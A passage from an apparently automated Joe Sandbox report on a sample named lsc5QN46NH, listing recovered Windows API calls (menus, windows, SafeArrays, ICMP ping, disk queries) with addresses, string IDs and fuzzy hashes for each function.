                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3096461208-0
                                                                                                                • Opcode ID: e0a377d361c8e737065e1584921ed4865d990cd05ad0d00ecf5654e905d262ab
                                                                                                                • Instruction ID: 9256800d42b90784d6cebc2646a532cfcf3fbc102a5d8836279f576aded79691
                                                                                                                • Opcode Fuzzy Hash: e0a377d361c8e737065e1584921ed4865d990cd05ad0d00ecf5654e905d262ab
                                                                                                                • Instruction Fuzzy Hash: 97514071B00305BFDB18CFA9DD89AAEBBB6EB88311F14822DF915D7290D7709D448B10
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00601B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00602036,?,00000000,?,?,?,?,006016CB,00000000,?), ref: 00601B9A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006020D3
                                                                                                                • KillTimer.USER32(-00000001,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0060216E
                                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0063BCA6
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0063BCD7
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0063BCEE
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0063BD0A
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0063BD1C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 641708696-0
                                                                                                                • Opcode ID: 4c60cbc8ac7aaf7fecf871888242d332e7dd6fea8e48a3b11b9a5f8bae4da849
                                                                                                                • Instruction ID: 084f9aa43137e194188f51e3b8b6aca0983c35b200484515ac2337715f109ff1
                                                                                                                • Opcode Fuzzy Hash: 4c60cbc8ac7aaf7fecf871888242d332e7dd6fea8e48a3b11b9a5f8bae4da849
                                                                                                                • Instruction Fuzzy Hash: 3B616730141A11EFDB399F14DD68B6BB7F3FF40312F50A529E6438AAA0C770A891DB90
                                                                                                                APIs
                                                                                                                  • Part of subcall function 006025DB: GetWindowLongW.USER32(?,000000EB), ref: 006025EC
                                                                                                                • GetSysColor.USER32(0000000F), ref: 006021D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorLongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 259745315-0
                                                                                                                • Opcode ID: 298a9ad1848567527b19cfbeb176aa1fecfd15796fd2e82787746a195e13591b
                                                                                                                • Instruction ID: c46ee624f7739e6d369c14a67329ac29cb0d0efd19210daadca50f40bd599a4d
                                                                                                                • Opcode Fuzzy Hash: 298a9ad1848567527b19cfbeb176aa1fecfd15796fd2e82787746a195e13591b
                                                                                                                • Instruction Fuzzy Hash: 65419031040141ABDB295F68DC9CBFA3B67EF46321F145365FE658A2E1C7318D82DB61
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?,0068F910), ref: 0066A90B
                                                                                                                • GetDriveTypeW.KERNEL32(00000061,006B89A0,00000061), ref: 0066A9D5
                                                                                                                • _wcscpy.LIBCMT ref: 0066A9FF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                • API String ID: 2820617543-1000479233
                                                                                                                • Opcode ID: 2c42dc7f0273bdd93b4fe60e64dda0cb07c4c3883866367eb59edcaf42a68497
                                                                                                                • Instruction ID: aaffd12cd4406c5aab7661eeeb49d98dc97b48ba854d34abcdf19149bd127507
                                                                                                                • Opcode Fuzzy Hash: 2c42dc7f0273bdd93b4fe60e64dda0cb07c4c3883866367eb59edcaf42a68497
                                                                                                                • Instruction Fuzzy Hash: 0451A931158301AFC744EF54C992AAFB7ABEF84304F54492EF496672A2DB319909CB93
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __i64tow__itow__swprintf
                                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                                • API String ID: 421087845-2263619337
                                                                                                                • Opcode ID: f8fea7afa10db1ac4eb9468fc520545603c4d426e2c90f6b3fb30db5db4fe76b
                                                                                                                • Instruction ID: 33d9ea78ff7e64fceb19d7d288533892e713e0560f520899e9543d7ca394d158
                                                                                                                • Opcode Fuzzy Hash: f8fea7afa10db1ac4eb9468fc520545603c4d426e2c90f6b3fb30db5db4fe76b
                                                                                                                • Instruction Fuzzy Hash: 2B41D671944615AFEB28DF34D842EB773EBEF05310F20886EE549D7392EA719942CB60
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0068716A
                                                                                                                • CreateMenu.USER32 ref: 00687185
                                                                                                                • SetMenu.USER32(?,00000000), ref: 00687194
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00687221
                                                                                                                • IsMenu.USER32(?), ref: 00687237
                                                                                                                • CreatePopupMenu.USER32 ref: 00687241
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0068726E
                                                                                                                • DrawMenuBar.USER32 ref: 00687276
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                • String ID: 0$F
                                                                                                                • API String ID: 176399719-3044882817
                                                                                                                • Opcode ID: 3c17664cc7d94465b585303cfe296d1f04a2ce62b1dd070ab6a2ef803743fe30
                                                                                                                • Instruction ID: 4a9dbe948e0f82f89e69294e31e211b2eafabeb20b00a8b297f2e022cf4564c5
                                                                                                                • Opcode Fuzzy Hash: 3c17664cc7d94465b585303cfe296d1f04a2ce62b1dd070ab6a2ef803743fe30
                                                                                                                • Instruction Fuzzy Hash: 42415B74A01205EFDB10EF64D898EDA7BB6FF49310F244228F955A7361D731A910CF90
                                                                                                                APIs
                                                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0068755E
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00687565
                                                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00687578
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00687580
                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0068758B
                                                                                                                • DeleteDC.GDI32(00000000), ref: 00687594
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0068759E
                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 006875B2
                                                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006875BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                • String ID: static
                                                                                                                • API String ID: 2559357485-2160076837
                                                                                                                • Opcode ID: c76d704899191fc0d7a0e49a3f40240f4549045064af98076c5798f09fa9fa75
                                                                                                                • Instruction ID: 2550664bced877db7cf1f377c910e484e48b1d27f1edf09b5738951062dfbc73
                                                                                                                • Opcode Fuzzy Hash: c76d704899191fc0d7a0e49a3f40240f4549045064af98076c5798f09fa9fa75
                                                                                                                • Instruction Fuzzy Hash: D3317E32104214BBDF11AF64DC08FDB3B6AFF09321F211324FA15961A0DB71D861DBA5
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00626E3E
                                                                                                                  • Part of subcall function 00628B28: __getptd_noexit.LIBCMT ref: 00628B28
                                                                                                                • __gmtime64_s.LIBCMT ref: 00626ED7
                                                                                                                • __gmtime64_s.LIBCMT ref: 00626F0D
                                                                                                                • __gmtime64_s.LIBCMT ref: 00626F2A
                                                                                                                • __allrem.LIBCMT ref: 00626F80
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00626F9C
                                                                                                                • __allrem.LIBCMT ref: 00626FB3
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00626FD1
                                                                                                                • __allrem.LIBCMT ref: 00626FE8
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00627006
                                                                                                                • __invoke_watson.LIBCMT ref: 00627077
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 384356119-0
                                                                                                                • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                • Instruction ID: 752c9cf661e035f38df7894944d0479f63c2bb5407bf330bcba9f598ea0e3686
                                                                                                                • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                • Instruction Fuzzy Hash: 0671E6B6A00F27ABD7149E78EC41B9AB3A6AF04324F14412DF514D7781E770E9048FD4
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00662542
                                                                                                                • GetMenuItemInfoW.USER32(006C5890,000000FF,00000000,00000030), ref: 006625A3
                                                                                                                • SetMenuItemInfoW.USER32(006C5890,00000004,00000000,00000030), ref: 006625D9
                                                                                                                • Sleep.KERNEL32(000001F4), ref: 006625EB
                                                                                                                • GetMenuItemCount.USER32(?), ref: 0066262F
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0066264B
                                                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00662675
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 006626BA
                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00662700
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00662714
                                                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00662735
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4176008265-0
                                                                                                                • Opcode ID: feb4eb92f74b7ca96264dbcb99ca5b487aec1966cdb70571c087f2a96183a388
                                                                                                                • Instruction ID: 1194c25fafe74403257f9c6127d0e44a216943bc8a54bc00d650bc2324b4226f
                                                                                                                • Opcode Fuzzy Hash: feb4eb92f74b7ca96264dbcb99ca5b487aec1966cdb70571c087f2a96183a388
                                                                                                                • Instruction Fuzzy Hash: 4761AFB0900A4AAFDB21CFA4DCA8DFE7BBAFB41344F140169E842E7251D731AD05DB61
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00686FA5
                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00686FA8
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00686FCC
                                                                                                                • _memset.LIBCMT ref: 00686FDD
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00686FEF
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00687067
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 830647256-0
                                                                                                                • Opcode ID: 0e76c6563aa9ca16f569143023e12e9b1d7e5da7d8fabbba29575ca0fddd078a
                                                                                                                • Instruction ID: d91f62cca699efd0673bd04de08097973473d77f2eaf2cb87a010b3c516ae7a0
                                                                                                                • Opcode Fuzzy Hash: 0e76c6563aa9ca16f569143023e12e9b1d7e5da7d8fabbba29575ca0fddd078a
                                                                                                                • Instruction Fuzzy Hash: 4E616D75900208AFDB11DFA4CC85EEE77FAEB09710F244259FA15AB3A1C771AD41DB50
                                                                                                                APIs
                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00656BBF
                                                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00656C18
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00656C2A
                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00656C4A
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00656C9D
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00656CB1
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00656CC6
                                                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00656CD3
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00656CDC
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00656CEE
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00656CF9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2706829360-0
                                                                                                                • Opcode ID: d620490b5053376a2438565b0b36f57b250160b9a5deb4c59552b3cae6e73ec7
                                                                                                                • Instruction ID: 0d532475edda1025f69cece8b9277ab9cc40a3ec7e1a45ca8fdb7f602bae0c6f
                                                                                                                • Opcode Fuzzy Hash: d620490b5053376a2438565b0b36f57b250160b9a5deb4c59552b3cae6e73ec7
                                                                                                                • Instruction Fuzzy Hash: 77415275A00119AFCF04DF64D8449EEBBBAEF08355F408169F955E7362CB31A949CFA0
                                                                                                                APIs
                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00675793
                                                                                                                • inet_addr.WSOCK32(?,?,?), ref: 006757D8
                                                                                                                • gethostbyname.WSOCK32(?), ref: 006757E4
                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 006757F2
                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00675862
                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00675878
                                                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 006758ED
                                                                                                                • WSACleanup.WSOCK32 ref: 006758F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                • String ID: Ping
                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                • Opcode ID: 152303f9ee7c56cb8ce9c63adaa1118d7a82db4c7f00e6d6655237fb254edeee
                                                                                                                • Instruction ID: 7940fffe52967ef6175e103aec9d7f07501846d952e412a7b4460f0a8b26cb1a
                                                                                                                • Opcode Fuzzy Hash: 152303f9ee7c56cb8ce9c63adaa1118d7a82db4c7f00e6d6655237fb254edeee
                                                                                                                • Instruction Fuzzy Hash: 73518E71600610EFD710AF24DC45B6A7BE6EF48720F048A69F99ADB3E1DB70E800CB56
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0066B4D0
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0066B546
                                                                                                                • GetLastError.KERNEL32 ref: 0066B550
                                                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0066B5BD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                • Opcode ID: 6148856900f317de55066d2cf21f9968a4f89d8d11a9af47660493e310caf2ad
                                                                                                                • Instruction ID: a25255a576d2434ca8586b61455e755d99e3c00c298af9d2669669920168879f
                                                                                                                • Opcode Fuzzy Hash: 6148856900f317de55066d2cf21f9968a4f89d8d11a9af47660493e310caf2ad
                                                                                                                • Instruction Fuzzy Hash: D5319075A40209EFCB04EF68C885EEE7BB6FF09310F105129F506D7292DB719A82CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                  • Part of subcall function 0065AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0065AABC
                                                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00659014
                                                                                                                • GetDlgCtrlID.USER32 ref: 0065901F
                                                                                                                • GetParent.USER32 ref: 0065903B
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0065903E
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00659047
                                                                                                                • GetParent.USER32(?), ref: 00659063
                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00659066
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1536045017-1403004172
                                                                                                                • Opcode ID: 6c1612e2874f9e30288ddc29db6e6bdee17b6eba2db7eb5aeeb6911fab01dd10
                                                                                                                • Instruction ID: bd3a14b30a4889ff8407ca3cb3cab65b7973ecd34edab7fd3eb2517b8eccf0d9
                                                                                                                • Opcode Fuzzy Hash: 6c1612e2874f9e30288ddc29db6e6bdee17b6eba2db7eb5aeeb6911fab01dd10
